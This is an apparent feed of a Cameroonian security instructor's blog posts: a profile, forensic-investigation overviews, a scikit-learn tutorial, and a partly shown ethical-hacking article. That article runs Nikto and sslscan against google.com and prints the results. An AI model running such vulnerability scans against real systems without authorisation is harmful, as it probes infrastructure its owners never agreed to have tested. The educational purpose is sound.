Forem: BEIDI DINA SAMUEL The latest articles on Forem by BEIDI DINA SAMUEL (@samglish). https://forem.com/samglish https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1482888%2F39c67aba-6953-4507-b3e6-d8c42092886f.jpg Forem: BEIDI DINA SAMUEL https://forem.com/samglish en BEIDI DINA SAMUEL : Le spécialiste qui Bâtit la Cybersécurité depuis Maroua BEIDI DINA SAMUEL Thu, 21 Aug 2025 22:08:14 +0000 https://forem.com/samglish/beidi-dina-samuel-le-specialiste-qui-batit-la-cybersecurite-depuis-maroua-4dfm https://forem.com/samglish/beidi-dina-samuel-le-specialiste-qui-batit-la-cybersecurite-depuis-maroua-4dfm <p>Dans le paysage technologique camerounais, où l'innovation est souvent concentrée dans les grandes métropoles, des figures émergent en démontrant que l'expertise n'a pas de frontières géographiques. Parmi elles, BEIDI DINA SAMUEL, un professionnel de l'informatique et de la cybersécurité basé à Maroua, se distingue par son parcours et son engagement envers sa communauté.</p> <p>Instructeur à l'École Nationale Supérieure Polytechnique de Maroua (ENSPM) et titulaire d'un master en ingénierie des réseaux et systèmes, BEIDI DINA SAMUEL a su transformer ses connaissances académiques en actions concrètes. Ses compétences couvrent des domaines critiques tels que le développement de logiciels web et mobiles, l'administration de systèmes et de réseaux, l'ingénierie AWS, et surtout, la cybersécurité.</p> <p>Son dévouement à la sécurité numérique s'est traduit par la création de la Cybersecurity Maroua Community (CMC). Cette initiative vise à fédérer les passionnés de cybersécurité de la région, à partager les connaissances et à renforcer les compétences locales dans un domaine en constante évolution. La CMC est un véritable hub d'apprentissage et de collaboration, prouvant qu'il est possible de créer des centres d'expertise en dehors des zones traditionnellement considérées comme technologiques.</p> <p>Sur des plateformes comme Medium et DEV Community, il partage activement son savoir-faire technique à travers des articles détaillés sur le piratage éthique, l'analyse des vulnérabilités ou encore l'investigation numérique. Il a également une présence notable sur GitHub où il présente des projets personnels, dont un mini-programme de traduction du français vers le fulfuldé, démontrant son habileté à développer des solutions pertinentes pour sa propre communauté.</p> <p>Par son travail d'instructeur, son engagement communautaire et ses contributions en ligne, BEIDI DINA SAMUEL s'impose comme une figure montante de la tech camerounaise. Il incarne une nouvelle génération de professionnels qui non seulement maîtrisent leur art, mais s'efforcent également de créer des opportunités et de démocratiser le savoir là où il est le plus nécessaire.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl9g44d1e3mjjjoxra90c.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl9g44d1e3mjjjoxra90c.png" alt=" " width="800" height="1200"></a></p> cybersecurity opensource beididinasamuel machinelearning Computer Crime Investigation BEIDI DINA SAMUEL Fri, 13 Jun 2025 22:26:05 +0000 https://forem.com/samglish/computer-crime-investigation-56fd https://forem.com/samglish/computer-crime-investigation-56fd <h3> Introduction </h3> <p>Computer crime investigation is a branch of digital forensics that aims to detect, analyze, preserve, and present digital evidence related to illegal activities carried out via or against computer systems.</p> <h3> Objectives of Digital Investigation </h3> <ul> <li>Identify sources of digital evidence.</li> <li>Preserve the integrity of collected data.</li> <li>Reconstruct events that led to an attack.</li> <li>Identify the perpetrators or those responsible for malicious actions.</li> <li>Provide admissible evidence in a court of law.</li> </ul> <h3> Key Steps in the Investigation </h3> <ol> <li>Identification</li> <li>Detection of an incident or crime (e.g., intrusion, fraud, data theft).</li> <li>Defining the digital crime scene.</li> <li>Preservation</li> <li>Backing up systems, drives, and event logs.</li> <li>Using bit-by-bit imaging tools to avoid altering evidence.</li> <li>Collection</li> <li>Extracting files, emails, logs, metadata, etc.</li> <li>Maintaining the chain of custody.</li> <li>Analysis</li> <li>Examining data using specialized tools (e.g., EnCase, Autopsy, Volatility).</li> <li>Reconstructing activities: logins, transfers, deletions, etc.</li> <li>Presentation</li> <li>Writing a clear and chronological technical report.</li> <li>Legal use of evidence: expert testimony, submitting evidence in court.</li> </ol> <h3> Types of Computer Crimes Investigated </h3> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Type of Crime</th> <th>Example</th> </tr> </thead> <tbody> <tr> <td><strong>Intrusion</strong></td> <td>Unauthorized access to a server</td> </tr> <tr> <td><strong>Fraud</strong></td> <td>Phishing, bank fraud</td> </tr> <tr> <td><strong>Espionage</strong></td> <td>Theft of confidential data</td> </tr> <tr> <td><strong>Sabotage</strong></td> <td>Data deletion or denial of service</td> </tr> <tr> <td><strong>Hacking</strong></td> <td>Deployment of malicious software (malware)</td> </tr> </tbody> </table></div> <h3> Tools and Methods Used </h3> <p><strong>Disk Analysis</strong>: FTK Imager, Autopsy<br><br> <strong>RAM Analysis</strong>: Volatility Framework<br><br> <strong>Network Analysis</strong>: Wireshark, tcpdump<br><br> <strong>Timeline and Correlation</strong>: Plaso, SleuthKit</p> <h3> Legal Aspects </h3> <ul> <li>Comply with local laws (e.g., GDPR, cybersecurity laws, Budapest Convention).</li> <li>Digital evidence must be <strong>authentic</strong>, <strong>intact</strong>, <strong>complete</strong>, and <strong>explainable</strong>.</li> </ul> <h3> Best Practices </h3> <ul> <li>Always work on a <strong>copy</strong> of the original data.</li> <li> <strong>Document</strong> every action (time, tool used, responsible person).</li> <li>Use <strong>certified tools</strong> recognized by the forensic community.</li> </ul> cybersecurity beididinasamuel Investigation-Situation-Overview BEIDI DINA SAMUEL Sat, 07 Jun 2025 23:20:53 +0000 https://forem.com/samglish/investigation-situation-overview-mdb https://forem.com/samglish/investigation-situation-overview-mdb <h3> Forensics (or forensic analysis) </h3> <blockquote> <p>Forensics involves examining and analyzing computer systems after a security incident to collect digital evidence. The main objectives are to understand what happened, reconstruct the timeline of events, identify causes, and determine corrective actions.</p> <ul> <li>Methodology for evidence recovery</li> <li>Investigation processes</li> <li>Valid legal evidence</li> <li>Ethical considerations</li> <li>Techniques used by attackers</li> </ul> </blockquote> <h3> Statistics </h3> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzriijwklaefdhqp0z08k.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzriijwklaefdhqp0z08k.png" alt=" " width="800" height="413"></a></p> <h3> Aspects of Organizational Security </h3> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Aspect</th> <th>Examples</th> </tr> </thead> <tbody> <tr> <td>IT security</td> <td>Application, antivirus, networks</td> </tr> <tr> <td>Physical security</td> <td>Individuals, biometric security</td> </tr> <tr> <td>Financial security</td> <td>Fraud, botnets, phishing</td> </tr> <tr> <td>Legal security</td> <td>National security, copyright</td> </tr> </tbody> </table></div> investigation Investigation Report BEIDI DINA SAMUEL Fri, 06 Jun 2025 23:20:52 +0000 https://forem.com/samglish/investigation-report-ioi https://forem.com/samglish/investigation-report-ioi <h1> 🕵️‍♂️ Summary: The Different Phases of Digital Investigation </h1> <p>Digital investigation is a structured process aimed at <strong>retrieving, analyzing, and utilizing digital traces</strong> following a security incident, fraud, or legal inquiry.</p> <h2> 🔍 1. Identification </h2> <p><strong>Objective</strong>: Detect that an incident has occurred and identify potential sources of evidence.</p> <p><strong>Key actions</strong>:</p> <ul> <li>Monitoring system logs</li> <li>Security alerts (SIEM, IDS/IPS)</li> <li>User reports</li> </ul> <h2> 📦 2. Preservation (or Acquisition) </h2> <p><strong>Objective</strong>: Secure data without alteration to ensure evidence integrity.</p> <p><strong>Key actions</strong>:</p> <ul> <li>Creating bit-by-bit disk images</li> <li>Using write blockers</li> <li>Maintaining chain of custody</li> </ul> <h2> 🧪 3. Analysis </h2> <p><strong>Objective</strong>: Deeply examine collected data to extract relevant information.</p> <p><strong>Types of analysis</strong>:</p> <ul> <li>Log file review</li> <li>Malware or backdoor detection</li> <li>Metadata extraction</li> <li>Network traffic analysis (PCAP)</li> </ul> <h2> 🧾 4. Documentation </h2> <p><strong>Objective</strong>: Accurately record every step to ensure reproducibility and legal admissibility.</p> <p><strong>Best practices</strong>:</p> <ul> <li>Timestamp all actions</li> <li>Take screenshots</li> <li>Write a structured report</li> </ul> <h2> 🧑‍⚖️ 5. Presentation </h2> <p><strong>Objective</strong>: Present the findings to decision-makers, investigators, or in court.</p> <p><strong>Possible formats</strong>:</p> <ul> <li>Technical reports</li> <li>Visual summaries</li> <li>Expert testimony</li> </ul> <h2> 🛡️ 6. Bypassing / Active Response </h2> <p><strong>Objective</strong>: In offensive or defensive contexts, understand how protections were bypassed.</p> <p><strong>Associated actions</strong>:</p> <ul> <li>Analyzing rootkits or evasion techniques</li> <li>Reconstructing the attack vector</li> </ul> <h2> 🧭 7. Tracing Activities </h2> <p><strong>Objective</strong>: Identify past activity even if attempts were made to erase it.</p> <p><strong>Examples</strong>:</p> <ul> <li>Recovering deleted files</li> <li>Reviewing login histories</li> <li>Restoring digital artifacts</li> </ul> <h2> 🧱 8. Finding Hidden Traces </h2> <p><strong>Objective</strong>: Detect deliberately concealed evidence.</p> <p><strong>Techniques</strong>:</p> <ul> <li>Steganography analysis</li> <li>Searching unallocated disk space</li> <li>Analyzing suspicious timestamps</li> </ul> <blockquote> <p>✍️ <strong>Note</strong>: Each step must be carried out with precision and traceability, especially in a judicial context.</p> </blockquote> cybersecurity beididinasamuel Rapports d'investigations BEIDI DINA SAMUEL Fri, 06 Jun 2025 23:13:20 +0000 https://forem.com/samglish/rapports-dinvestigations-1dbh https://forem.com/samglish/rapports-dinvestigations-1dbh <ul> <li> Identifier et analyser les traces laissées lors de l'instruction dans un système informatique</li> <li>Collecter correctement les preuves nécessaires à des poursuites judiciaires</li> <li>Collecter et analyser des informations à des fins d'investigation</li> <li>Contourner les protections : pas uniquement de l'analyse finalement</li> <li>Suivi (tracking)</li> <li>Retrouver les traces : personnes ou journaux</li> <li>Trouver les traces cachées</li> </ul> <h1> Résumé : Les différentes parties de l'investigation numérique </h1> <p>L'investigation numérique est un processus structuré qui permet de <strong>retrouver, analyser et exploiter des traces numériques</strong> dans le cadre d’un incident de sécurité, d’une fraude, ou d’une enquête judiciaire.</p> <h2> 1. Identification </h2> <p><strong>Objectif</strong> : Détecter qu’un incident s’est produit et identifier les sources potentielles de preuves.</p> <p><strong>Actions clés</strong> :</p> <ul> <li>Surveillance des journaux systèmes</li> <li>Alertes de sécurité (SIEM, IDS/IPS)</li> <li>Rapports d’utilisateurs</li> </ul> <h2> 2. Préservation (ou acquisition) </h2> <p><strong>Objectif</strong> : Sauvegarder les données sans les altérer, pour garantir leur intégrité.</p> <p><strong>Actions clés</strong> :</p> <ul> <li>Création d’images disques (bit à bit)</li> <li>Blocage de l’écriture (write blocker)</li> <li>Chaîne de traçabilité (chain of custody)</li> </ul> <h2> 3. Analyse </h2> <p><strong>Objectif</strong> : Examiner en profondeur les données collectées pour extraire les éléments pertinents.</p> <p><strong>Types d’analyse</strong> :</p> <ul> <li>Analyse des fichiers journaux (logs)</li> <li>Recherche de malwares ou de backdoors</li> <li>Extraction de métadonnées</li> <li>Analyse réseau (PCAP)</li> </ul> <h2> 4. Documentation </h2> <p><strong>Objectif</strong> : Noter précisément chaque étape pour assurer la reproductibilité et la validité judiciaire.</p> <p><strong>Bonnes pratiques</strong> :</p> <ul> <li>Horodatage de chaque action</li> <li>Captures d’écran</li> <li>Rapport structuré</li> </ul> <h2> 5. Présentation </h2> <p><strong>Objectif</strong> : Présenter les résultats de l’analyse à des décideurs, enquêteurs ou en justice.</p> <p><strong>Supports possibles</strong> :</p> <ul> <li>Rapports techniques</li> <li>Synthèses visuelles</li> <li>Témoignage en cour</li> </ul> <h2> 6. Contournement / Réponse active </h2> <p><strong>Objectif</strong> : Dans certains contextes offensifs ou défensifs, il faut aussi comprendre comment les protections ont été contournées.</p> <p><strong>Actions associées</strong> :</p> <ul> <li>Analyse de rootkits ou techniques d’évasion</li> <li>Reconstruction des vecteurs d’attaque</li> </ul> <h2> 7. Retrouver les traces </h2> <p><strong>Objectif</strong> : Identifier les activités passées malgré des tentatives de suppression.</p> <p><strong>Exemples</strong> :</p> <ul> <li>Récupération de fichiers supprimés</li> <li>Historique des connexions</li> <li>Restauration d’artefacts</li> </ul> <h2> 8. Recherche des traces cachées </h2> <p><strong>Objectif</strong> : Détecter des preuves dissimulées volontairement.</p> <p><strong>Techniques</strong> :</p> <ul> <li>Analyse de stéganographie</li> <li>Recherche dans les espaces non alloués</li> <li>Analyse des time stamps anormaux</li> </ul> <blockquote> <p><strong>Note</strong> : Chaque étape doit être menée avec rigueur et traçabilité, notamment dans un cadre judiciaire.</p> </blockquote> investigation beididinasamuel cybersecurity Handwritten digit recognition with scikit-learn BEIDI DINA SAMUEL Tue, 28 Jan 2025 17:45:13 +0000 https://forem.com/samglish/handwritten-digit-recognition-with-scikit-learn-38bf https://forem.com/samglish/handwritten-digit-recognition-with-scikit-learn-38bf <h1> <code>scikit-learn</code> </h1> <p>Handwritten digit recognition with scikit-learn<br> </p> <h3> <code>Installing scikit-learn</code> </h3> <ul> <li>Use pip virtualenv </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">pip</span> <span class="n">install</span> <span class="o">-</span><span class="n">U</span> <span class="n">scikit</span><span class="o">-</span><span class="n">learn</span> </code></pre> </div> <ul> <li>Use conda </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">conda</span> <span class="n">create</span> <span class="o">-</span><span class="n">n</span> <span class="n">sklearn</span><span class="o">-</span><span class="n">env</span> <span class="o">-</span><span class="n">c</span> <span class="n">conda</span><span class="o">-</span><span class="n">forge</span> <span class="n">scikit</span><span class="o">-</span><span class="n">learn</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>conda activate sklearn-env </code></pre> </div> <p>see the documentation for more information <a href="https://scikit-learn.org/stable/install.html" rel="noopener noreferrer"></a><a href="https://scikit-learn.org/stable/install.html" rel="noopener noreferrer">https://scikit-learn.org/stable/install.html</a><br> </p> <h3> We trained a simple neural network to recognize the numbers in these images. This network will take 1D arrays of 8x8=64 values as input. We then converted these 2D images into 1D arrays </h3> <p>We start by loading the sample<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">sklearn</span> <span class="kn">import</span> <span class="n">datasets</span> <span class="n">digits</span> <span class="o">=</span> <span class="n">datasets</span><span class="p">.</span><span class="nf">load_digits</span><span class="p">()</span> </code></pre> </div> <p>Then we print the first image<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="nf">print</span><span class="p">(</span><span class="n">digits</span><span class="p">.</span><span class="n">images</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">[[ 0. 0. 5. 13. 9. 1. 0. 0.] [ 0. 0. 13. 15. 10. 15. 5. 0.] [ 0. 3. 15. 2. 0. 11. 8. 0.] [ 0. 4. 12. 0. 0. 8. 8. 0.] [ 0. 5. 8. 0. 0. 9. 8. 0.] [ 0. 4. 11. 0. 1. 12. 7. 0.] [ 0. 2. 14. 5. 10. 12. 0. 0.] [ 0. 0. 6. 13. 10. 0. 0. 0.]] </span></code></pre> </div> <p>Like all the images in the sample, this one is an 8x8 pixel image, black and white (a single color level per pixel). It can be displayed in the following way, also indicating the corresponding label (the number to which the image corresponds)<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code> <span class="kn">import</span> <span class="n">matplotlib.pyplot</span> <span class="k">as</span> <span class="n">plt</span> <span class="n">plt</span><span class="p">.</span><span class="nf">imshow</span><span class="p">(</span><span class="n">digits</span><span class="p">.</span><span class="n">images</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span><span class="n">cmap</span><span class="o">=</span><span class="sh">'</span><span class="s">binary</span><span class="sh">'</span><span class="p">)</span> <span class="n">plt</span><span class="p">.</span><span class="nf">title</span><span class="p">(</span><span class="n">digits</span><span class="p">.</span><span class="n">target</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="n">plt</span><span class="p">.</span><span class="nf">axis</span><span class="p">(</span><span class="sh">'</span><span class="s">off</span><span class="sh">'</span><span class="p">)</span> <span class="n">plt</span><span class="p">.</span><span class="nf">show</span><span class="p">()</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/output1.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/output1.png" width="800" height="400"></a></p> <p>We will train a simple neural network to recognize numbers in these images. This network will take 1D arrays of 8x8=64 values as input. So we need to convert our 2D images into 1D arrays<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">x</span> <span class="o">=</span> <span class="n">digits</span><span class="p">.</span><span class="n">images</span><span class="p">.</span><span class="nf">reshape</span><span class="p">((</span><span class="nf">len</span><span class="p">(</span><span class="n">digits</span><span class="p">.</span><span class="n">images</span><span class="p">),</span> <span class="o">-</span><span class="mi">1</span><span class="p">))</span> </code></pre> </div> <p>x contient toutes les images en version 1D<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="nf">print</span><span class="p">(</span><span class="n">x</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">[ 0. 0. 5. 13. 9. 1. 0. 0. 0. 0. 13. 15. 10. 15. 5. 0. 0. 3. 15. 2. 0. 11. 8. 0. 0. 4. 12. 0. 0. 8. 8. 0. 0. 5. 8. 0. 0. 9. 8. 0. 0. 4. 11. 0. 1. 12. 7. 0. 0. 2. 14. 5. 10. 12. 0. 0. 0. 0. 6. 13. 10. 0. 0. 0.] </span></code></pre> </div> <p>The network will act as a function allowing you to go from an array of 64 input values to an output value, its estimate of the figure. Here are the output values<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">y</span> <span class="o">=</span> <span class="n">digits</span><span class="p">.</span><span class="n">target</span> <span class="nf">print</span><span class="p">(</span><span class="nf">len</span><span class="p">(</span><span class="n">digits</span><span class="p">.</span><span class="n">images</span><span class="p">))</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">1797 </span></code></pre> </div> <h3> We will create a relatively simple neural network, with a single layer of 15 neurons. </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">from</span> <span class="n">sklearn.neural_network</span> <span class="kn">import</span> <span class="n">MLPClassifier</span> <span class="n">mlp</span> <span class="o">=</span> <span class="nc">MLPClassifier</span><span class="p">(</span><span class="n">hidden_layer_sizes</span><span class="o">=</span><span class="p">(</span><span class="mi">15</span><span class="p">,))</span> </code></pre> </div> <p>We will train this network on the first 1000 images of our sample, and reserve the following images to test the performance of the network<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">x_train</span> <span class="o">=</span> <span class="n">x</span><span class="p">[:</span><span class="mi">1000</span><span class="p">]</span> <span class="n">y_train</span> <span class="o">=</span> <span class="n">y</span><span class="p">[:</span><span class="mi">1000</span><span class="p">]</span> <span class="n">x_test</span> <span class="o">=</span> <span class="n">x</span><span class="p">[</span><span class="mi">1000</span><span class="p">:]</span> <span class="n">y_test</span> <span class="o">=</span> <span class="n">y</span><span class="p">[</span><span class="mi">1000</span><span class="p">:]</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">mlp</span><span class="p">.</span><span class="nf">fit</span><span class="p">(</span><span class="n">x_train</span><span class="p">,</span> <span class="n">y_train</span><span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/home/samglish/.local/lib/python3.9/site-packages/sklearn/neural_network/_multilayer_perceptron.py:691: ConvergenceWarning: Stochastic Optimizer: Maximum iterations (200) reached and the optimization hasn't converged yet. </code></pre> </div> <p>And There you go ! we can now look at what the network gives for the following images, which were not seen by the network during training<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">mlp</span><span class="p">.</span><span class="nf">predict</span><span class="p">(</span><span class="n">x_test</span><span class="p">[:</span><span class="mi">10</span><span class="p">])</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">array([1, 4, 0, 5, 3, 6, 9, 6, 1, 7]) </span></code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">y_test</span><span class="p">[:</span><span class="mi">10</span><span class="p">]</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">array([1, 4, 0, 5, 3, 6, 9, 6, 1, 7]) </span></code></pre> </div> <p>For the first 10 test images, the estimates are excellent!<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">y_pred</span> <span class="o">=</span> <span class="n">mlp</span><span class="p">.</span><span class="nf">predict</span><span class="p">(</span><span class="n">x_test</span><span class="p">)</span> </code></pre> </div> <p>Then search for the images for which the network made a mistake<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">error</span> <span class="o">=</span> <span class="p">(</span><span class="n">y_pred</span> <span class="o">!=</span> <span class="n">y_test</span><span class="p">)</span> </code></pre> </div> <p>Here is the calculation of the error rate<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">numpy</span> <span class="k">as</span> <span class="n">np</span> <span class="n">np</span><span class="p">.</span><span class="nf">sum</span><span class="p">(</span><span class="n">error</span><span class="p">)</span> <span class="o">/</span> <span class="nf">len</span><span class="p">(</span><span class="n">y_test</span><span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">0.09535759096612297 </span></code></pre> </div> <p>We can finally select the bad predictions to display them<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="n">x_error</span> <span class="o">=</span> <span class="n">x_test</span><span class="p">[</span><span class="n">error</span><span class="p">].</span><span class="nf">reshape</span><span class="p">((</span><span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="mi">8</span><span class="p">,</span><span class="mi">8</span><span class="p">))</span> <span class="n">y_error</span> <span class="o">=</span> <span class="n">y_test</span><span class="p">[</span><span class="n">error</span><span class="p">]</span> <span class="n">y_pred_error</span> <span class="o">=</span> <span class="n">y_pred</span><span class="p">[</span><span class="n">error</span><span class="p">]</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">1</span> <span class="n">plt</span><span class="p">.</span><span class="nf">imshow</span><span class="p">(</span><span class="n">x_error</span><span class="p">[</span><span class="n">i</span><span class="p">],</span><span class="n">cmap</span><span class="o">=</span><span class="sh">'</span><span class="s">binary</span><span class="sh">'</span><span class="p">)</span> <span class="n">plt</span><span class="p">.</span><span class="nf">title</span><span class="p">(</span><span class="sa">f</span><span class="sh">'</span><span class="s">cible: </span><span class="si">{</span><span class="n">y_error</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="si">}</span><span class="s">, prediction: </span><span class="si">{</span><span class="n">y_pred_error</span><span class="p">[</span><span class="n">i</span><span class="p">]</span><span class="si">}</span><span class="sh">'</span><span class="p">)</span> <span class="n">plt</span><span class="p">.</span><span class="nf">axis</span><span class="p">(</span><span class="sh">'</span><span class="s">off</span><span class="sh">'</span><span class="p">)</span> <span class="n">plt</span><span class="p">.</span><span class="nf">show</span><span class="p">()</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/output.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/output.png" width="800" height="400"></a><br> As we can see, it is difficult to classify these images, even for a human<br> For better performance, higher resolution images and a more complex neural network, such as a convolutional network, should be used.</p> datascience scikitlearn neuralnetwork machinelearning Ethical Hacking - This article is about discovering vulnerabilities in web applications. BEIDI DINA SAMUEL Mon, 09 Sep 2024 14:55:56 +0000 https://forem.com/samglish/ethical-hacking-this-article-is-about-discovering-vulnerabilities-in-web-applications-3no5 https://forem.com/samglish/ethical-hacking-this-article-is-about-discovering-vulnerabilities-in-web-applications-3no5 <h2> We will use a range of tools to discover application failures. </h2> <p><strong>Github :</strong> <a href="https://github.com/samglish/web_exploitation_scanning" rel="noopener noreferrer">https://github.com/samglish/web_exploitation_scanning</a></p> <h3> Example of tools that we will use. </h3> <ol> <li><code>Nikto</code></li> <li><code>Sslscan</code></li> <li><code>Sslyze</code></li> <li>OWASP Zed Attack Proxy(<code>ZAP</code>)</li> <li><code>BurpSuite</code></li> <li><code>Sqlmap</code></li> <li>bare hand analysis - &gt; <code>CSRF</code> </li> <li>Scripting - &gt; <code>Python</code> - &gt; validation of command injections (<code>HTTP</code>,<code>ICMP</code>)</li> </ol> <h1> 1. Nikto </h1> <p>Terminal<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>nikto <span class="nt">-host</span> google.com <span class="nt">-port</span> 443 <span class="nt">-ssl</span> </code></pre> </div> <p>OUTPUT<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>- Nikto v2.1.6 <span class="nt">---------------------------------------------------------------------------</span> + Target IP: 142.251.135.110 + Target Hostname: google.com + Target Port: 443 <span class="nt">---------------------------------------------------------------------------</span> + SSL Info: Subject: /CN<span class="o">=</span><span class="k">*</span>.google.com Ciphers: TLS_AES_256_GCM_SHA384 Issuer: /C<span class="o">=</span>US/O<span class="o">=</span>Google Trust Services/CN<span class="o">=</span>WR2 + Start Time: 2024-09-09 14:01:05 <span class="o">(</span>GMT1<span class="o">)</span> <span class="nt">---------------------------------------------------------------------------</span> + Server: gws + X-XSS-Protection header has been <span class="nb">set </span>to disable XSS Protection. There is unlikely to be a good reason <span class="k">for </span>this. + Uncommon header <span class="s1">'alt-svc'</span> found, with contents: <span class="nv">h3</span><span class="o">=</span><span class="s2">":443"</span><span class="p">;</span> <span class="nv">ma</span><span class="o">=</span>2592000,h3-29<span class="o">=</span><span class="s2">":443"</span><span class="p">;</span> <span class="nv">ma</span><span class="o">=</span>2592000 + The site uses SSL and the Strict-Transport-Security HTTP header is not defined. + The site uses SSL and Expect-CT header is not present. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site <span class="k">in </span>a different fashion to the MIME <span class="nb">type</span> + Root page / redirects to: https://www.google.com/ </code></pre> </div> <h1> 2. Sslscan </h1> <p>Terminal<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>sslscan google.com </code></pre> </div> <p>OUTPUT<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>Version: 2.0.10-static OpenSSL 1.1.1l-dev xx XXX xxxx Connected to 142.251.135.110 Testing SSL server google.com on port 443 using SNI name google.com SSL/TLS Protocols: SSLv2 disabled SSLv3 disabled TLSv1.0 enabled TLSv1.1 enabled TLSv1.2 enabled TLSv1.3 enabled TLS Fallback SCSV: Server supports TLS Fallback SCSV TLS renegotiation: Secure session renegotiation supported TLS Compression: Compression disabled Heartbleed: TLSv1.3 not vulnerable to heartbleed TLSv1.2 not vulnerable to heartbleed TLSv1.1 not vulnerable to heartbleed TLSv1.0 not vulnerable to heartbleed Supported Server Cipher<span class="o">(</span>s<span class="o">)</span>: Preferred TLSv1.3 128 bits TLS_AES_128_GCM_SHA256 Curve 25519 DHE 253 Accepted TLSv1.3 256 bits TLS_AES_256_GCM_SHA384 Curve 25519 DHE 253 Accepted TLSv1.3 256 bits TLS_CHACHA20_POLY1305_SHA256 Curve 25519 DHE 253 Preferred TLSv1.2 256 bits ECDHE-ECDSA-CHACHA20-POLY1305 Curve 25519 DHE 253 Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-GCM-SHA256 Curve 25519 DHE 253 Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-GCM-SHA384 Curve 25519 DHE 253 Accepted TLSv1.2 128 bits ECDHE-ECDSA-AES128-SHA Curve 25519 DHE 253 Accepted TLSv1.2 256 bits ECDHE-ECDSA-AES256-SHA Curve 25519 DHE 253 Accepted TLSv1.2 256 bits ECDHE-RSA-CHACHA20-POLY1305 Curve 25519 DHE 253 Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve 25519 DHE 253 Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve 25519 DHE 253 Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve 25519 DHE 253 Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve 25519 DHE 253 Accepted TLSv1.2 128 bits AES128-GCM-SHA256 Accepted TLSv1.2 256 bits AES256-GCM-SHA384 Accepted TLSv1.2 128 bits AES128-SHA Accepted TLSv1.2 256 bits AES256-SHA Accepted TLSv1.2 112 bits DES-CBC3-SHA Preferred TLSv1.1 128 bits ECDHE-ECDSA-AES128-SHA Curve 25519 DHE 253 Accepted TLSv1.1 256 bits ECDHE-ECDSA-AES256-SHA Curve 25519 DHE 253 Accepted TLSv1.1 128 bits 